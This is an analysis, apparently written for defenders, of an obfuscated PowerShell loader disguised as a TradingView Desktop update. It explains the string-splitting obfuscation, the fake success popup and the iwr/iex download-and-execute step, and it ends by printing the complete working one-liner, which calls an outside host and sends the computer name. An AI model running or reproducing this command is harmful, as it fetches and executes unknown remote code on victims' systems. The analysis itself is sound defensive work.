This PowerShell code appears to be a malicious script that is attempting to execute a command on the system. Here is a breakdown of its functionality:
1. The script sets multiple variables:
- `$launch='launch'`
- `$update='update'`
- `$TWDesktop='dlr'+'.com'`
- `$flow='flow'`
- `$ai='htt'`
- `$model='ps://ea'`
- `$dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername`
2. It sets the security protocol to TLS 1.2:
- `[nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12`
3. It then makes a web request to the URL stored in `$dev` variable using `iwr` (Invoke-WebRequest):
- `iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'`
4. It creates a message box using `WScript.Shell` with the message "TradingView Desktop updated!".
- `$command=New-Object -ComObject Wscript.Shell`
- `$status='TradingView Desktop '+$update+'d!'`
- `$command.Popup($status,180,'Success',0x0)`
5. Finally, it executes the result of the web request with `iex` (Invoke-Expression):
- `iex $done;`
This script is attempting to reach a potentially malicious URL, fetch the content, and execute it on the system. The use of `Invoke-Expression` (`iex`) with the result of a web request is a common technique used by attackers to download and run malicious code on the victim's system. It is strongly advised not to run this script as it poses a security risk to the system.
1 powershell -c "$launch='launch'; $update='update'; $TWDesktop='dlr'+'.com'; $flow='flow'; $ai='htt';$model='ps://ea'; $dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername; [nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12; $done= iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'; $command=New-Object -ComObject Wscript.Shell; $status='TradingView Desktop '+$update+'d!'; $command.Popup($status,180,'Success',0x0); iex $done;"